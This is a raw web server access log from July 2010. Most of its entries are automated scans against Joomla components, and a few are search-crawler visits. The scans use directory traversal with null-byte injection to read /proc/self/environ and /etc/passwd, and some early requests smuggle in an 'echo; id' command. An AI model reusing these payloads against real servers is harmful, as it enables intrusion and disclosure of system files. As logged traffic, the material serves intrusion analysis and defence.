213.215.178.34 - - [26/Jul/2010:05:14:22 +0200] "GET /logs/index.php?option=com_perchaimageattach&controller=%7Cecho%20v0pCr3w%3Bid%7C HTTP/1.1" 404 301 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
213.215.178.34 - - [26/Jul/2010:05:14:22 +0200] "GET /index.php?option=com_perchaimageattach&controller=%7Cecho%20v0pCr3w%3Bid%7C HTTP/1.1" 404 296 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
213.215.178.34 - - [26/Jul/2010:05:14:37 +0200] "GET /index.php?option=com_perchaimageattach&controller=%7Cecho%20v0pCr3w%3Bid%7C HTTP/1.1" 404 296 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
213.215.178.34 - - [26/Jul/2010:05:14:44 +0200] "GET /logs/access_log/index.php?option=com_perchaimageattach&controller=%7Cecho%20v0pCr3w%3Bid%7C HTTP/1.1" 404 312 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
213.215.178.34 - - [26/Jul/2010:05:14:45 +0200] "GET /index.php?option=com_perchaimageattach&controller=%7Cecho%20v0pCr3w%3Bid%7C HTTP/1.1" 404 296 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
213.215.178.34 - - [26/Jul/2010:05:14:45 +0200] "GET /logs/index.php?option=com_perchaimageattach&controller=%7Cecho%20v0pCr3w%3Bid%7C HTTP/1.1" 404 301 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
207.46.13.47 - - [26/Jul/2010:05:16:30 +0200] "GET /robots.txt HTTP/1.1" 404 297 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
207.46.13.47 - - [26/Jul/2010:05:20:58 +0200] "GET / HTTP/1.1" 200 560 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
216.227.218.75 - - [26/Jul/2010:05:21:58 +0200] "GET //plugins/system/cdscriptegrator/libraries/highslide/js/jsloader.php?files=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 354 "-" "libwww-perl/5.832"
89.200.169.163 - - [26/Jul/2010:05:21:59 +0200] "GET /?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 560 "-" "libwww-perl/5.813"
89.200.169.163 - - [26/Jul/2010:05:21:59 +0200] "GET /?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 560 "-" "libwww-perl/5.813"
64.34.172.171 - - [26/Jul/2010:05:22:07 +0200] "GET //plugins/system/cdscriptegrator/libraries/highslide/js/jsloader.php?files=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 354 "-" "libwww-perl/5.834"
188.127.248.175 - - [26/Jul/2010:05:22:10 +0200] "GET //plugins/system/cdscriptegrator/libraries/highslide/js/jsloader.php?files=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 354 "-" "libwww-perl/5.808"
216.227.218.75 - - [26/Jul/2010:05:22:26 +0200] "GET /logs/access_log//plugins/system/cdscriptegrator/libraries/highslide/js/jsloader.php?files=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 370 "-" "libwww-perl/5.832"
216.227.218.75 - - [26/Jul/2010:05:22:26 +0200] "GET //plugins/system/cdscriptegrator/libraries/highslide/js/jsloader.php?files=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 354 "-" "libwww-perl/5.832"
216.227.218.75 - - [26/Jul/2010:05:22:26 +0200] "GET /logs//plugins/system/cdscriptegrator/libraries/highslide/js/jsloader.php?files=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 359 "-" "libwww-perl/5.832"
216.227.218.75 - - [26/Jul/2010:05:23:05 +0200] "GET /logs/access_log//plugins/system/cdscriptegrator/libraries/highslide/js/jsloader.php?files=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 370 "-" "libwww-perl/5.832"
216.227.218.75 - - [26/Jul/2010:05:23:05 +0200] "GET //plugins/system/cdscriptegrator/libraries/highslide/js/jsloader.php?files=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 354 "-" "libwww-perl/5.832"
216.227.218.75 - - [26/Jul/2010:05:23:05 +0200] "GET /logs//plugins/system/cdscriptegrator/libraries/highslide/js/jsloader.php?files=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 359 "-" "libwww-perl/5.832"
64.34.172.171 - - [26/Jul/2010:05:23:09 +0200] "GET /logs/access_log//plugins/system/cdscriptegrator/libraries/highslide/js/jsloader.php?files=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 370 "-" "libwww-perl/5.834"
64.34.172.171 - - [26/Jul/2010:05:23:10 +0200] "GET //plugins/system/cdscriptegrator/libraries/highslide/js/jsloader.php?files=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 354 "-" "libwww-perl/5.834"
64.34.172.171 - - [26/Jul/2010:05:23:10 +0200] "GET /logs//plugins/system/cdscriptegrator/libraries/highslide/js/jsloader.php?files=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 359 "-" "libwww-perl/5.834"
188.127.248.175 - - [26/Jul/2010:05:23:35 +0200] "GET /logs/access_log//plugins/system/cdscriptegrator/libraries/highslide/js/jsloader.php?files=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 370 "-" "libwww-perl/5.808"
188.127.248.175 - - [26/Jul/2010:05:23:35 +0200] "GET //plugins/system/cdscriptegrator/libraries/highslide/js/jsloader.php?files=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 354 "-" "libwww-perl/5.808"
188.127.248.175 - - [26/Jul/2010:05:23:35 +0200] "GET /logs//plugins/system/cdscriptegrator/libraries/highslide/js/jsloader.php?files=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 359 "-" "libwww-perl/5.808"
89.200.169.163 - - [26/Jul/2010:05:24:01 +0200] "GET /logs/?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 797 "-" "libwww-perl/5.813"
89.200.169.163 - - [26/Jul/2010:05:24:01 +0200] "GET /?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 560 "-" "libwww-perl/5.813"
89.200.169.163 - - [26/Jul/2010:05:24:09 +0200] "GET /logs/?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 797 "-" "libwww-perl/5.813"
89.200.169.163 - - [26/Jul/2010:05:24:09 +0200] "GET /?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 560 "-" "libwww-perl/5.813"
64.34.172.171 - - [26/Jul/2010:05:26:09 +0200] "GET /logs/access_log//plugins/system/cdscriptegrator/libraries/highslide/js/jsloader.php?files=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 370 "-" "libwww-perl/5.834"
64.34.172.171 - - [26/Jul/2010:05:26:09 +0200] "GET //plugins/system/cdscriptegrator/libraries/highslide/js/jsloader.php?files=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 354 "-" "libwww-perl/5.834"
64.34.172.171 - - [26/Jul/2010:05:26:09 +0200] "GET /logs//plugins/system/cdscriptegrator/libraries/highslide/js/jsloader.php?files=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 359 "-" "libwww-perl/5.834"
89.200.169.163 - - [26/Jul/2010:05:28:33 +0200] "GET /logs/access_log/?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 303 "-" "libwww-perl/5.813"
89.200.169.163 - - [26/Jul/2010:05:28:33 +0200] "GET /?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 560 "-" "libwww-perl/5.813"
89.200.169.163 - - [26/Jul/2010:05:28:34 +0200] "GET /logs/?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 797 "-" "libwww-perl/5.813"
89.200.169.163 - - [26/Jul/2010:05:29:19 +0200] "GET /logs/access_log/?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 303 "-" "libwww-perl/5.813"
89.200.169.163 - - [26/Jul/2010:05:29:19 +0200] "GET /?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 560 "-" "libwww-perl/5.813"
89.200.169.163 - - [26/Jul/2010:05:29:20 +0200] "GET /logs/?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 797 "-" "libwww-perl/5.813"
201.12.141.11 - - [26/Jul/2010:05:29:35 +0200] "GET /index.php?option=com_svmap&controller=./../../../../../../../../etc/passwd%00 HTTP/1.1" 404 296 "-" "-"
201.12.141.11 - - [26/Jul/2010:05:29:35 +0200] "GET /index.php?option=com_svmap&controller=./../../../../../../../../etc/passwd HTTP/1.1" 404 296 "-" "-"
213.215.178.34 - - [26/Jul/2010:05:31:06 +0200] "GET /logs/index.php?option=com_perchaimageattach&controller=../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
213.215.178.34 - - [26/Jul/2010:05:31:06 +0200] "GET /index.php?option=com_perchaimageattach&controller=../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
213.215.178.34 - - [26/Jul/2010:05:31:07 +0200] "GET /logs/access_log/index.php?option=com_perchaimageattach&controller=../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
213.215.178.34 - - [26/Jul/2010:05:31:07 +0200] "GET /index.php?option=com_perchaimageattach&controller=../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
213.215.178.34 - - [26/Jul/2010:05:31:07 +0200] "GET /logs/index.php?option=com_perchaimageattach&controller=../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
213.215.178.34 - - [26/Jul/2010:05:31:10 +0200] "GET /index.php?option=com_perchaimageattach&controller=../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
201.12.141.11 - - [26/Jul/2010:05:39:43 +0200] "GET /index.php?option=com_svmap&controller=./../../../../../../../../etc/passwd%00 HTTP/1.1" 404 296 "-" "-"
201.12.141.11 - - [26/Jul/2010:05:39:43 +0200] "GET /index.php?option=com_svmap&controller=./../../../../../../../../etc/passwd HTTP/1.1" 404 296 "-" "-"
64.34.172.171 - - [26/Jul/2010:05:40:37 +0200] "GET //index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.834"
216.227.218.75 - - [26/Jul/2010:05:40:49 +0200] "GET //index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.832"
188.127.248.175 - - [26/Jul/2010:05:41:18 +0200] "GET //index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.808"
78.41.204.220 - - [26/Jul/2010:05:49:55 +0200] "GET /logs//?option=com_webeecomment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 802 "-" "libwww-perl/5.813"
78.41.204.220 - - [26/Jul/2010:05:49:55 +0200] "GET //?option=com_webeecomment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 666 "-" "libwww-perl/5.813"
216.227.218.75 - - [26/Jul/2010:05:57:02 +0200] "GET /logs/access_log//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 313 "-" "libwww-perl/5.832"
216.227.218.75 - - [26/Jul/2010:05:57:02 +0200] "GET //index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.832"
216.227.218.75 - - [26/Jul/2010:05:57:02 +0200] "GET /logs//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-" "libwww-perl/5.832"
188.127.248.175 - - [26/Jul/2010:06:13:51 +0200] "GET /logs/access_log//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 313 "-" "libwww-perl/5.808"
188.127.248.175 - - [26/Jul/2010:06:13:52 +0200] "GET //index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.808"
188.127.248.175 - - [26/Jul/2010:06:13:52 +0200] "GET /logs//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-" "libwww-perl/5.808"
67.195.112.43 - - [26/Jul/2010:06:14:07 +0200] "GET /robots.txt HTTP/1.0" 404 297 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
67.195.112.43 - - [26/Jul/2010:06:14:08 +0200] "GET /logs/?C=M;O=D HTTP/1.0" 200 797 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
80.248.211.49 - - [26/Jul/2010:06:37:05 +0200] "GET //index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.813"
207.46.195.235 - - [26/Jul/2010:06:46:27 +0200] "GET /?C=N;O=D HTTP/1.1" 200 560 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
62.149.233.199 - - [26/Jul/2010:06:48:52 +0200] "GET /logs/access_log/index.php?option=com_sbsfile&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 "-" "libwww-perl/5.805"
62.149.233.199 - - [26/Jul/2010:06:48:52 +0200] "GET /index.php?option=com_sbsfile&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.805"
83.233.211.252 - - [26/Jul/2010:06:52:48 +0200] "GET /logs/access_log//index.php?option=com_mscomment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 313 "-" "libwww-perl/5.808"
83.233.211.252 - - [26/Jul/2010:06:53:03 +0200] "GET /logs//index.php?option=com_mscomment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-" "libwww-perl/5.808"
80.248.211.49 - - [26/Jul/2010:06:54:50 +0200] "GET /logs/access_log//index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 313 "-" "libwww-perl/5.813"
80.248.211.49 - - [26/Jul/2010:06:54:50 +0200] "GET //index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.813"
80.248.211.49 - - [26/Jul/2010:06:54:50 +0200] "GET /logs//index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-" "libwww-perl/5.813"
62.149.233.199 - - [26/Jul/2010:07:03:36 +0200] "GET /index.php?option=com_sbsfile&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.805"
91.121.7.123 - - [26/Jul/2010:07:09:08 +0200] "GET //index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.810"
216.227.218.75 - - [26/Jul/2010:07:09:09 +0200] "GET //index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.832"
64.34.172.171 - - [26/Jul/2010:07:09:51 +0200] "GET //index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.834"
188.127.248.175 - - [26/Jul/2010:07:10:01 +0200] "GET //index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.808"
216.227.218.75 - - [26/Jul/2010:07:20:58 +0200] "GET /logs/access_log//index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 313 "-" "libwww-perl/5.832"
216.227.218.75 - - [26/Jul/2010:07:20:58 +0200] "GET //index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.832"
216.227.218.75 - - [26/Jul/2010:07:20:59 +0200] "GET /logs//index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-" "libwww-perl/5.832"
91.215.170.13 - - [26/Jul/2010:07:21:50 +0200] "GET //index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.831"
91.215.170.13 - - [26/Jul/2010:07:21:53 +0200] "GET //index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.831"
91.215.170.13 - - [26/Jul/2010:07:22:10 +0200] "GET /logs//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-" "libwww-perl/5.831"
91.121.7.123 - - [26/Jul/2010:07:22:11 +0200] "GET /logs/access_log//index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 313 "-" "libwww-perl/5.810"
91.215.170.13 - - [26/Jul/2010:07:22:11 +0200] "GET //index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.831"
91.121.7.123 - - [26/Jul/2010:07:22:11 +0200] "GET //index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.810"
91.121.7.123 - - [26/Jul/2010:07:22:11 +0200] "GET /logs//index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-" "libwww-perl/5.810"
91.215.170.13 - - [26/Jul/2010:07:22:29 +0200] "GET //index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.831"
91.215.170.13 - - [26/Jul/2010:07:22:32 +0200] "GET //index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.831"
91.215.170.13 - - [26/Jul/2010:07:22:33 +0200] "GET //index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.831"
91.215.170.13 - - [26/Jul/2010:07:22:35 +0200] "GET //index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.831"
91.215.170.13 - - [26/Jul/2010:07:23:15 +0200] "GET /logs//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-" "libwww-perl/5.831"
91.215.170.13 - - [26/Jul/2010:07:23:15 +0200] "GET //index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.831"
91.215.170.13 - - [26/Jul/2010:07:23:23 +0200] "GET /logs//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-" "libwww-perl/5.831"
91.215.170.13 - - [26/Jul/2010:07:23:23 +0200] "GET //index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.831"
188.127.248.175 - - [26/Jul/2010:07:24:06 +0200] "GET /logs/access_log//index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 313 "-" "libwww-perl/5.808"
188.127.248.175 - - [26/Jul/2010:07:24:06 +0200] "GET //index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.808"
188.127.248.175 - - [26/Jul/2010:07:24:07 +0200] "GET /logs//index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-" "libwww-perl/5.808"
91.215.170.13 - - [26/Jul/2010:07:24:25 +0200] "GET //index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.831"
91.215.170.13 - - [26/Jul/2010:07:24:32 +0200] "GET //index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.831"
91.215.170.13 - - [26/Jul/2010:07:24:32 +0200] "GET /logs//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-" "libwww-perl/5.831"
91.215.170.13 - - [26/Jul/2010:07:24:32 +0200] "GET //index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.831"
91.215.170.13 - - [26/Jul/2010:07:24:32 +0200] "GET //index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.831"
64.34.172.171 - - [26/Jul/2010:07:28:06 +0200] "GET /logs/access_log//index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 313 "-" "libwww-perl/5.834"
64.34.172.171 - - [26/Jul/2010:07:28:06 +0200] "GET //index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.834"
64.34.172.171 - - [26/Jul/2010:07:28:06 +0200] "GET /logs//index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-" "libwww-perl/5.834"
91.215.170.13 - - [26/Jul/2010:07:29:26 +0200] "GET /logs/access_log//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 313 "-" "libwww-perl/5.831"
91.215.170.13 - - [26/Jul/2010:07:29:26 +0200] "GET //index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.831"
91.215.170.13 - - [26/Jul/2010:07:29:26 +0200] "GET /logs//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-" "libwww-perl/5.831"
91.215.170.13 - - [26/Jul/2010:07:30:05 +0200] "GET /logs/access_log//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 313 "-" "libwww-perl/5.831"
91.215.170.13 - - [26/Jul/2010:07:30:05 +0200] "GET //index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.831"
91.215.170.13 - - [26/Jul/2010:07:30:06 +0200] "GET /logs//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-" "libwww-perl/5.831"
91.215.170.13 - - [26/Jul/2010:07:34:38 +0200] "GET /logs/access_log//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 313 "-" "libwww-perl/5.831"
91.215.170.13 - - [26/Jul/2010:07:34:38 +0200] "GET //index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.831"
91.215.170.13 - - [26/Jul/2010:07:34:39 +0200] "GET /logs//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-" "libwww-perl/5.831"
91.215.170.13 - - [26/Jul/2010:07:34:39 +0200] "GET /logs/access_log//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 313 "-" "libwww-perl/5.831"
91.215.170.13 - - [26/Jul/2010:07:34:40 +0200] "GET //index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.831"
91.215.170.13 - - [26/Jul/2010:07:34:40 +0200] "GET /logs//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-" "libwww-perl/5.831"
94.247.177.18 - - [26/Jul/2010:07:47:31 +0200] "GET //index.php?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.805"
178.162.133.106 - - [26/Jul/2010:07:47:32 +0200] "GET //index.php?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.823"
91.215.170.13 - - [26/Jul/2010:07:47:55 +0200] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.831"
202.160.123.72 - - [26/Jul/2010:07:49:35 +0200] "GET //index.php?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.805"
87.98.217.83 - - [26/Jul/2010:07:55:36 +0200] "GET //index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.803"
87.98.217.83 - - [26/Jul/2010:07:55:36 +0200] "GET //index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.803"
178.162.133.106 - - [26/Jul/2010:07:58:18 +0200] "GET /logs/access_log//index.php?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 313 "-" "libwww-perl/5.823"
178.162.133.106 - - [26/Jul/2010:07:58:18 +0200] "GET //index.php?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.823"
178.162.133.106 - - [26/Jul/2010:07:58:18 +0200] "GET /logs//index.php?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-" "libwww-perl/5.823"
114.108.151.149 - - [26/Jul/2010:08:00:21 +0200] "GET //index2.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-" "libwww-perl/5.805"
114.108.151.149 - - [26/Jul/2010:08:00:43 +0200] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.805"
121.78.118.123 - - [26/Jul/2010:08:01:08 +0200] "GET //index2.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-" "libwww-perl/5.805"
121.78.118.123 - - [26/Jul/2010:08:01:09 +0200] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.805"
91.215.170.13 - - [26/Jul/2010:08:01:11 +0200] "GET /logs/access_log//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 313 "-" "libwww-perl/5.831"
91.215.170.13 - - [26/Jul/2010:08:01:12 +0200] "GET //index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.831"
91.215.170.13 - - [26/Jul/2010:08:01:12 +0200] "GET /logs//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-" "libwww-perl/5.831"
